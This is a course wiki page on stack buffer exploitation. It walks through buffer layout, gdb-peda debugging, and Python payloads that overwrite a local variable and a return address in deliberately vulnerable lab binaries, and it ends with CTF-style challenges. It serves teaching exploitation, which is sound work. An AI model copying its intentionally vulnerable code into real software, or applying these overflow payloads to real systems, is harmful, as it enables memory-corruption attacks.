User Tools

Site Tools


Sidebar

session:06

0x05. Buffer Exploitation

Resources

Tutorials

Buffers

A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes.

In C, we can declare a buffer of bytes as a char array, as follows:

char local_buffer[32];

Which results in the following assembly code:

080483db <main>:
 80483db:	55                   	push   ebp
 80483dc:	89 e5                	mov    ebp,esp
 80483de:	83 ec 20             	sub    esp,0x20
 80483e1:	b8 00 00 00 00       	mov    eax,0x0
 80483e6:	c9                   	leave  
 80483e7:	c3                   	ret 

Notice that buffer allocation is done by simply subtracting its intended size from the current stack pointer (sub esp, 0x20). This simply reserves space on the stack (remember that on x86 the stack grows “upwards”, from higher addresses to lower ones).

A compiler may allocate more space on the stack than explicitly required. For example, on a 64-bit machine with stack canary enabled (an additional 64-bit value is implicitly placed between buffers and the return address - more on that in future sessions), declaring either char s[32] or char s[40] might yield sub rsp, 0x30 to align buffers at 16 bytes thresholds.

To exploit a program, the C source code may not be a good enough reference point. Only disassembling the executable will provide relevant information.

Buffers can be also be stored in other places in memory, such as the heap, .bss or .rodata.

You can find the following code snippet here (buffers/buffers.c).

buffers.c
#include <stdio.h>
#include <stdlib.h>
 
char g_buf_init_zero[32] = {0};
/* g_buf_init_vals[5..31] will be 0 */
char g_buf_init_vals[32] = {1, 2, 3, 4, 5};
const char g_buf_const[32] = "Hello, world\n";
 
int main(void)
{
	char l_buf[32];
	static char s_l_buf[32];
	char *heap_buf = malloc(32);
 
	free(heap_buf);
 
	return 0;
}

Let's have a look at the executable sections:

$ readelf -S buffers
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
...
  [16] .rodata           PROGBITS        080485a0 0005a0 000040 00   A  0   0 32
...
  [24] .data             PROGBITS        0804a020 001020 000040 00  WA  0   0 32
  [25] .bss              NOBITS          0804a060 001060 000060 00  WA  0   0 32
...
Key to Flags:
  W (write)
  A (alloc)

And the address of each symbol (buffer in this case):

080485c0 R g_buf_const
0804a040 D g_buf_init_vals
0804a080 B g_buf_init_zero
0804a0a0 b s_l_buf.2387
 
Key to Flags:
  R (symbol is read-only)
  D (symbol in initialized data section)
  B (symbol in BSS data section)
 
  Uppercase and lowercase flags have the same meaning.
  A lowercase flag means variable is not visible outside the module

Alternatively, you can use gdb to extract information on each symbol:

gdb-peda$ p &g_buf_const
$1 = (<data variable, no debug info> *) 0x80485c0 <g_buf_const>

Using this information you can map each symbol to a data section. For example, the address of g_buf_const is 0x80485c0, so it is placed in the .rodata section addr=0x080485a0; size=0x40.

Non-static local variables and dynamically allocated buffers cannot be seen in the executable (they have meaning only at runtime, because they are allocated on the stack or heap when the code reaches a certain point. Let's inspect the execution right before calling free() and see where the heap buffer will be placed:

gdb-peda$ 
----------------------------------registers-----------------------------------]
EAX: 0x804b160 --> 0x0 
EBX: 0x0 
ECX: 0x21e79 
EDX: 0x804b160 --> 0x0 
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0xffffd798 --> 0x0 
ESP: 0xffffd750 --> 0x804b160 --> 0x0 
EIP: 0x80484e8 (<main+50>:	call   0x8048350 <free@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484df <main+41>:	mov    DWORD PTR [ebp-0x30],eax
   0x80484e2 <main+44>:	sub    esp,0xc
   0x80484e5 <main+47>:	push   DWORD PTR [ebp-0x30]
=> 0x80484e8 <main+50>:	call   0x8048350 <free@plt>
   0x80484ed <main+55>:	add    esp,0x10
   0x80484f0 <main+58>:	mov    eax,0x0
   0x80484f5 <main+63>:	mov    edx,DWORD PTR [ebp-0xc]
   0x80484f8 <main+66>:	xor    edx,DWORD PTR gs:0x14
Guessed arguments:
arg[0]: 0x804b160 --> 0x0 
[------------------------------------stack-------------------------------------]
0000| 0xffffd750 --> 0x804b160 --> 0x0 
0004| 0xffffd754 --> 0xffffd9e0 ("examples/buffers")
0008| 0xffffd758 --> 0xf7e0f049 (add    ebx,0x1a4fb7)
0012| 0xffffd75c --> 0xf7fb7748 --> 0x0 
0016| 0xffffd760 --> 0xf7fb4000 --> 0x1d4d6c 
0020| 0xffffd764 --> 0xf7fb4000 --> 0x1d4d6c 
0024| 0xffffd768 --> 0x804b160 --> 0x0 
0028| 0xffffd76c --> 0xf7e0f1ab (add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
 
gdb-peda$ x/wx $ebp-0x30
0xffffd768:	0x0804b160
gdb-peda$ vmm
Start      End        Perm	Name
...
0x0804b000 0x0806d000 rw-p	[heap]
...

The gdb-peda vmm command displays the virtual memory map of the process; this can be used to easily inspect the addresses and permissions of each memory region.

You can find the following code snippet here (init_buffer/init_buffer.c).

Let's fill our stack buffer with some values and disassemble the binary:

init_buffer.c
char local_buffer[32];
unsigned int i = 0;
 
for (i = 0; i < 32; i++) {
    local_buffer[i] = i;
}
080483db <main>:
 80483db:       55                      push   ebp
 80483dc:       89 e5                   mov    ebp,esp
 80483de:       83 ec 24                sub    esp,0x24                      ; reserve space for both the local_buffer (0x20) and i (0x4)
 80483e1:       c7 45 fc 00 00 00 00    mov    DWORD PTR [ebp-0x4],0x0       ; initialize i
 80483e8:       c7 45 fc 00 00 00 00    mov    DWORD PTR [ebp-0x4],0x0       ; redundant unoptimized compiler logic
 80483ef:       eb 13                   jmp    8048404 <main+0x29>           ; goto the end of loop
 80483f1:       8b 45 fc                mov    eax,DWORD PTR [ebp-0x4]       ; get value of 'i' in eax
 80483f4:       89 c1                   mov    ecx,eax                       ; save 'i' in ecx
 80483f6:       8d 55 dc                lea    edx,[ebp-0x24]                ; load the address of 'local_buffer' in edx
 80483f9:       8b 45 fc                mov    eax,DWORD PTR [ebp-0x4]       ; get 'i'
 80483fc:       01 d0                   add    eax,edx                       ; compute address of 'local_buffer+i' in eax
 80483fe:       88 08                   mov    BYTE PTR [eax],cl             ; store 'i' at *(local_buffer+i)
 8048400:       83 45 fc 01             add    DWORD PTR [ebp-0x4],0x1       ; increment 'i'
 8048404:       83 7d fc 1f             cmp    DWORD PTR [ebp-0x4],0x1f      ; 'i==31'?
 8048408:       76 e7                   jbe    80483f1 <main+0x16>           ; continue loop if below or equal or fall through if above
 804840a:       b8 00 00 00 00          mov    eax,0x0
 804840f:       c9                      leave  
 8048410:       c3                      ret

Notice that now we subtract 0x24 from the stack pointer, since this time we also need to reserve space for the unsigned integer used as an index.

Similar to how arguments are referenced using ebp, so are the local variables. Since in most cases the value of ebp stays fixed throughout the execution of a function, you can easily track local variables and buffers by mapping names to offsets (i.e. 'i' to '-0x4', 'local_buffer' to '-0x24' and so on). Intermediary positions within the buffer are almost always computed by using the base address and adding an offset to it.

Values at offsets relative to ebp have their meaning defined by their use, instead of static names. This implies that even if the allocated space is 0x24, the compiler may reorder local buffers, and space may be interpreted as either 'i' at 'ebp-0x4' and 'local_buffer' at 'ebp-0x24', or 'i' at 'ebp-0x24' and 'local_buffer' at 'ebp-0x20'.

Finally, lets add one more interesting change to our code:

char local_buffer2[30];
char local_buffer[2];
unsigned int i = 0;
 
for (i = 0; i < 32; i++) {
    local_buffer[i] = i;
}

Can you guess how the resulting code will look like, disassembled? Where are we writing to?

Stack buffer overflows

As we have seen in previous sessions, the stack serves multiple purposes:

  • Passing function arguments from the caller to the callee
  • Storing local variables for functions
  • Temporarily saving register values before a call
  • Saving the return address and old frame pointer

Our previous example clearly showcases the fact that even though in an abstract sense, different buffers are separate from one another, ultimately they are just some regions of memory which do not have any intrinsic identification or associated size. This is the reason why in some higher level languages it is not possible to write beyond the bounds of containers - the size is integrated into the object itself.

But in our case, bounds are unchecked, therefore it is up to the programmer to code carefully. This includes checking for any overflows and using safe functions. Unfortunately, many functions in the standard C library, particularly those which work with strings and read user input, are unsafe - nowadays, the compiler will issue warnings when encountering them.

What can happen in the event that we write outside the bounds of a stack buffer?

You can find the following code snippet here (buffer_overflow/buffer_overflow.c).

buffer_overflow.c
void f(char *buf)
{
    unsigned int i = 0;
 
    for (i = 0; i < 100; i++) {
        buf[i] = i;
    }
}
 
int main(int argc, char* argv[])
{
    char local_buffer[32];
    f(local_buffer);
 
    return 0;
}
$ ./buffer_overflow 
Segmentation fault (core dumped)

What happened? Let's try to find the cause starting with the call of f:

gdb-peda$ b *0x08048430
Breakpoint 1 at 0x8048430
 
gdb-peda$ r
[----------------------------------registers-----------------------------------]
EAX: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
EBX: 0x0 
ECX: 0x38f575fd 
EDX: 0xffffd684 --> 0x0 
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0xffffd658 --> 0x0 
ESP: 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
EIP: 0x8048430 (<main+10>:	call   0x80483f6 <f>)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048429 <main+3>:	sub    esp,0x20
   0x804842c <main+6>:	lea    eax,[ebp-0x20]
   0x804842f <main+9>:	push   eax
=> 0x8048430 <main+10>:	call   0x80483f6 <f>
   0x8048435 <main+15>:	add    esp,0x4
   0x8048438 <main+18>:	mov    eax,0x0
   0x804843d <main+23>:	leave  
   0x804843e <main+24>:	ret
Guessed arguments:
arg[0]: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
arg[1]: 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
[------------------------------------stack-------------------------------------]
0000| 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
0004| 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
0008| 0xffffd63c --> 0x8048461 (<__libc_csu_init+33>:	lea    eax,[ebx-0xf4])
0012| 0xffffd640 --> 0xf7fe59b0 (push   ebp)
0016| 0xffffd644 --> 0x0 
0020| 0xffffd648 --> 0x8048449 (<__libc_csu_init+9>:	add    ebx,0x1bb7)
0024| 0xffffd64c --> 0x0 
0028| 0xffffd650 --> 0xf7fb4000 --> 0x1d4d6c 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
 
Breakpoint 1, 0x08048430 in main ()
 
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0xffffd69b --> 0x63 ('c')
EBX: 0x0 
ECX: 0x38f575fd 
EDX: 0x63 ('c')
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0xffffd658 (" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
ESP: 0xffffd634 --> 0xffffd638 --> 0x3020100 
EIP: 0x8048435 (<main+15>:	add    esp,0x4)
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804842c <main+6>:	lea    eax,[ebp-0x20]
   0x804842f <main+9>:	push   eax
   0x8048430 <main+10>:	call   0x80483f6 <f>
=> 0x8048435 <main+15>:	add    esp,0x4
   0x8048438 <main+18>:	mov    eax,0x0
   0x804843d <main+23>:	leave  
   0x804843e <main+24>:	ret    
   0x804843f:	nop
[------------------------------------stack-------------------------------------]
0000| 0xffffd634 --> 0xffffd638 --> 0x3020100 
0004| 0xffffd638 --> 0x3020100 
0008| 0xffffd63c --> 0x7060504 
0012| 0xffffd640 --> 0xb0a0908 
0016| 0xffffd644 --> 0xf0e0d0c 
0020| 0xffffd648 --> 0x13121110 
0024| 0xffffd64c --> 0x17161514 
0028| 0xffffd650 --> 0x1b1a1918 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048435 in main ()
 
gdb-peda$ b *0x0804843e
Breakpoint 2 at 0x0804843e
 
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0x38f575fd 
EDX: 0x63 ('c')
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0x23222120 (' !"#')
ESP: 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
EIP: 0x804843e (<main+24>:	ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048435 <main+15>:	add    esp,0x4
   0x8048438 <main+18>:	mov    eax,0x0
   0x804843d <main+23>:	leave  
=> 0x804843e <main+24>:	ret    
   0x804843f:	nop
   0x8048440 <__libc_csu_init>:	push   ebp
   0x8048441 <__libc_csu_init+1>:	push   edi
   0x8048442 <__libc_csu_init+2>:	push   esi
[------------------------------------stack-------------------------------------]
0000| 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0004| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0008| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0012| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0016| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0020| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0024| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0028| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
 
Breakpoint 2, 0x0804843e in main ()
 
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0x38f575fd 
EDX: 0x63 ('c')
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0x23222120 (' !"#')
ESP: 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
EIP: 0x27262524 ("$%&'")
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x27262524
[------------------------------------stack-------------------------------------]
0000| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0004| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0008| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0012| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0016| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0020| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0024| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
0028| 0xffffd67c ("DEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x27262524 in ?? ()

It seems that the return address of main, along with a lot more of the stack, gets overwritten with the characters that we write “in the buffer”. The program then tries to “return to $%&'” ($%&' is the ASCII representation of little endian 0x27262524), which is an unmapped address. This ultimately triggers a page fault, upon which the operating system signals a SIGSEGV and terminates the process.

A buffer overflow is an anomaly caused by writing beyond the bounds of a buffer; it is not necessarily a vulnerability. The presence of a buffer overflow can lead to strange behavior, a crash, arbitrary code execution or absolutely nothing.

Diverting code execution

We attempted to use the wonderful gets function, but the compiler does not generate it and the man page explicitly says:

DESCRIPTION
       Never use this function.

       gets()  reads  a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a
       null byte ('\0').  No check for buffer overrun is performed (see BUGS below).

However, we can still handcraft our own vulnerable scenario. Let's try to divert the code execution by using a buffer overflow vulnerability.

You can find the following code snippet here (buffer_overflow_var/buffer_overflow_var.c).

buffer_overflow_var.c
#include <stdio.h>
#include <stdlib.h>
 
void f(char* buf) {
 
    fgets(buf, 100, stdin);
}
 
int main(int argc, char* argv[])
{
    int critical_variable = 0;
    char local_buffer[32];
    f(local_buffer);
 
    if (critical_variable == 1337) {
        printf("Oh dear, you shouldn't be here!\n");
        system("/bin/sh");
    }
 
    return 0;
}

Our local_buffer is dangerously close to that critical variable. Let's see if we can overwrite it. We need 32 bytes of input to fill our buffer + 4 bytes for the integer.

$ python -c "print 'A'*32 + '1337'" | ./buffer_overflow_var

Nothing happened. Let's find out why. We'll save our payload to a file and run buffer_overflow_var under gdb, using the file as input:

$ python -c "print 'A'*32 + '1337'" > payload
$ gdb ./buffer_overflow_var
gdb-peda$ b *0x80484fc
Breakpoint 1 at 0x80484fc
 
gdb-peda$ r < payload
Starting program: ./buffer_overflow_var < payload
 
[----------------------------------registers-----------------------------------]
EAX: 0xffffd5dc ('A' <repeats 32 times>, "1337\n")
EBX: 0x0 
ECX: 0xf7fb589c --> 0x0 
EDX: 0xffffd5dc ('A' <repeats 32 times>, "1337\n")
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0xffffd608 --> 0x0 
ESP: 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c 
EIP: 0x80484fc (<main+39>:	cmp    DWORD PTR [ebp-0xc],0x539)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484f3 <main+30>:	push   eax
   0x80484f4 <main+31>:	call   0x80484b6 <f>
   0x80484f9 <main+36>:	add    esp,0x10
=> 0x80484fc <main+39>:	cmp    DWORD PTR [ebp-0xc],0x539
   0x8048503 <main+46>:	jne    0x8048525 <main+80>
   0x8048505 <main+48>:	sub    esp,0xc
   0x8048508 <main+51>:	push   0x80485c0
   0x804850d <main+56>:	call   0x8048360 <puts@plt>
[------------------------------------stack-------------------------------------]
0000| 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c 
0004| 0xffffd5d4 --> 0xf7fb4000 --> 0x1d4d6c 
0008| 0xffffd5d8 --> 0x0 
0012| 0xffffd5dc ('A' <repeats 32 times>, "1337\n")
0016| 0xffffd5e0 ('A' <repeats 28 times>, "1337\n")
0020| 0xffffd5e4 ('A' <repeats 24 times>, "1337\n")
0024| 0xffffd5e8 ('A' <repeats 20 times>, "1337\n")
0028| 0xffffd5ec ('A' <repeats 16 times>, "1337\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
 
Breakpoint 1, 0x080484fc in main ()
 
gdb-peda$ x/wx $ebp-0xc
0xffffd5fc:	0x37333331
gdb-peda$ x/s $ebp-0xc
0xffffd5fc:	"1337\n"
We usually use high level scripting languages, such as python to craft payloads. For example, to generate 32 As, we just use 'A'*32.

We can observe two things:

  • We actually wrote the string 1337, which is 0x37333331, instead of the actual value 1337 or 0x539 in hex.
  • We missed the fact that x86 is Little Endian, meaning that we should write the integer value into memory starting with the least significant byte first.

An easy way to overcome this is to write a small script which will generate the required payload for us, as follows:

#!/usr/bin/env python
import struct
 
buflen = 32
 
payload = 'A' * buflen
payload += struct.pack('<I', 1337)
 
open('payload', 'w').write(payload)

Note the use of struct.pack and struct.unpack when working with binary data that needs to be stored in various configurations.

Let's test our new payload:

$ cat payload | ./buffer_overflow_var 
Oh dear, you shouldn't be here!

It seems to alter the code flow as we wanted to, but it doesn't seem to spawn a (new) shell. What gives? The gist of the issue is the fact that the binary reads from stdin in one “chomp”. Our newly spawned shell has no input to read, and exits before we get a change to input any commands (similarly to how the shell behaves when sending Ctrl-D - end of input. We can use the following clever trick to keep stdin open for further user interaction:

$ cat payload - | ./buffer_overflow_var
Oh dear, you shouldn't be here!
date
Tue Jun 27 22:17:48 EEST 2017
whoami
root
We used the cat filename -| ./binary trick to concatenate the contents of filename with the standard input. Once EOF is reached, you can continue feeding data to the binary via the standard input.

Overwriting the stored return address

Let's wrap up our stack smashing adventure by changing the code flow through overwriting the return address stored on the stack.

You can find the following code snippet here (buffer_overflow_ret/buffer_overflow_ret.c).

buffer_overflow_ret.c
#include <stdio.h>
 
void win()
{
    printf("Well done!\n");
}
 
void f()
{
    printf("Nothing to see here\n");
}
 
void get_message(char *buf)
{
    fgets(buf, 100, stdin);
}
 
int main(int argc, char* argv[])
{
    char local_buffer[32];
 
    printf("Please leave a message: ");
    get_message(local_buffer);
 
    f();
 
    return 0;
}

First, let's trigger the program to crash like in the previous example:

$ ./buffer_overflow_ret 
Please leave a message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nothing to see here
Segmentation fault (core dumped)

However, we do not know at which point relative to the start of our buffer the saved return address gets overwritten. We can either compute it by looking at the disassembly and the stack layout or by using a De Bruijn pattern in PEDA. Such a pattern contains unique groups of 4 characters, meaning that each group will have a unique offset within the pattern.

$ gdb ./buffer_overflow_ret 
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r
Starting program: ./buffer_overflow_ret
Please leave a message: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALL
Nothing to see here
 
Program received signal SIGSEGV, Segmentation fault.
 
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0x804b160 ("Nothing to see here\nge: ")
EDX: 0xf7fb5890 --> 0x0 
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0x61414145 ('EAAa')
ESP: 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
EIP: 0x41304141 ('AA0A')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41304141
[------------------------------------stack-------------------------------------]
0000| 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0004| 0xffffd624 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0008| 0xffffd628 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0012| 0xffffd62c ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0016| 0xffffd630 ("2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0020| 0xffffd634 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0024| 0xffffd638 ("A3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
0028| 0xffffd63c ("IAAeAA4AAJAAfAA5AAKAAgAA6AA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41304141 in ?? ()
 
gdb-peda$ patto AA0A
AA0A found at offset: 40

This tells us that we need to write 40 characters into the buffer and then the next 4 bytes will overwrite the return address. Let's test this, again, by writing a script that can generate a payload, which we can easily tailor to our needs. First, let's see if we can reliably change the value of the return address. We'll attempt to write 0xdeadbeef first.

#!/usr/bin/env python
import struct
 
payload = 'A' * 36
payload += struct.pack('<I', 0xdeadbeef)
 
open('payload', 'w').write(payload)
gdb-peda$ r < payload
Starting program: ./buffer_overflow_ret < payload
Please leave a message: Nothing to see here
 
Program received signal SIGSEGV, Segmentation fault.
 
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0x804b160 ("Please leave a message: Nothing to see here\n")
EDX: 0xf7fb5890 --> 0x0 
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0x61616161 ('aaaa')
ESP: 0xffffd620 --> 0x0 
EIP: 0xdeadbeef
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0xdeadbeef
[------------------------------------stack-------------------------------------]
0000| 0xffffd620 --> 0x0 
0004| 0xffffd624 --> 0xffffd6b4 --> 0xffffd859 ("./buffer_overflow_ret")
0008| 0xffffd628 --> 0xffffd6bc --> 0xffffd8cb ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
0012| 0xffffd62c --> 0xffffd644 --> 0x0 
0016| 0xffffd630 --> 0x1 
0020| 0xffffd634 --> 0x0 
0024| 0xffffd638 --> 0xf7fb4000 --> 0x1d4d6c 
0028| 0xffffd63c --> 0xf7fe575a (add    edi,0x178a6)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xdeadbeef in ?? ()

Excellent. Now we can replace 0xdeadbeef with the address of the win function.

...
payload += struct.pack('<I', 0x080484b6)
...
$ cat payload | ./buffer_overflow_ret 
Please leave a message: Nothing to see here
Well done!
Segmentation fault (core dumped)

Our job here is done. Now it's time for you to smash some stacks.

Keep in mind that buffer overflows are not the only type of vulnerability, but they are very common.

Challenges

Before venturing forth, consider the following roadmap when approaching a challenge:
  • disassemble the binary
  • identify the stack buffer
  • identify functions which work with buffers
  • see if there are any mismatches (declared size vs. index used)
  • dynamic analysis in GDB; inject De Bruijn patterns whenever input is read
  • determine offset in buffer
  • write a script which generates a payload to reliably crash/exploit the target
  • keep stdin/connection open for further interaction after obtaining a shell
  • ???
  • PROFIT

Use the following archive.

01. Parrot

Some programs feature a “stack smashing protection” in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. If the value has changed, then the “canary” can conclude that stack data has been corrupted throughout the execution of the current function.

We have implemented our very own parrot. Can you avoid it somehow?

Values are little endian. So if you want to send 0xabcd you would send it as \xcd\xab\x00\x00.
When providing input to a program and wanting to maintain connection to its standard input, run:
cat payload - | ./program

Or, if you have a payload generator program such as payload.py, run:

cat <(python payload.py) - | ./program

02. Indexing

More complex programs require some form of protocol or user interaction. This is where the great pwntools come in.

Here's an interactive script to get you started:

exploit.py
#!/usr/bin/env python
from pwn import *
 
p = process('./indexing')
 
p.recvuntil('Index: ')
p.sendline() # TODO (must be string)
 
# Give value
p.recvuntil('Value: ')
p.sendline() # TODO (must be string)
p.interactive()
Go through GDB when aiming to solve this challenge. As all input values are strings, you can input them at the keyboard and follow their effect in GDB.
You can inspect the behavior of a program for a given input by doing:
cat payload | strace ./program

That is, you will trace the program being exploited and see read() or other calls and how they fare for a given input.

03. Smashthestack Level7

Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one.

There's an integer overflow + buffer overflow in the program.
What are the four 32 bit values that multiplied by 4 give you, let's say, 256?
In order to run a program that receives command line arguments under gdb, you can do the following:
$ gdb ./main
gdb$ set args arg1 arg2 arg3
gdb$ start

04. Neighbourly

Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. The principle is the same.

The ptext field of the structure is a function pointer. Overwrite it with the address of the win() function.

05. Uninitialized

There's something faulty in the program, and it's not an buffer overflow. Provide the proper input to the executable and get a shell.

Do not use pwntools for this task.

06: Bonus: Uninitialized 2

There's a small update to the uninitialized executable and you need to update your solution.

Use ltrace to understand what's happening differently.
Create a pwntools-based script to solve both the initial executable and the bonus one.

05. Bonus: Birds

Time for a more complex challenge. Be patient and don't speed through it.

session/06.txt · Last modified: 2020/07/19 12:49 (external edit)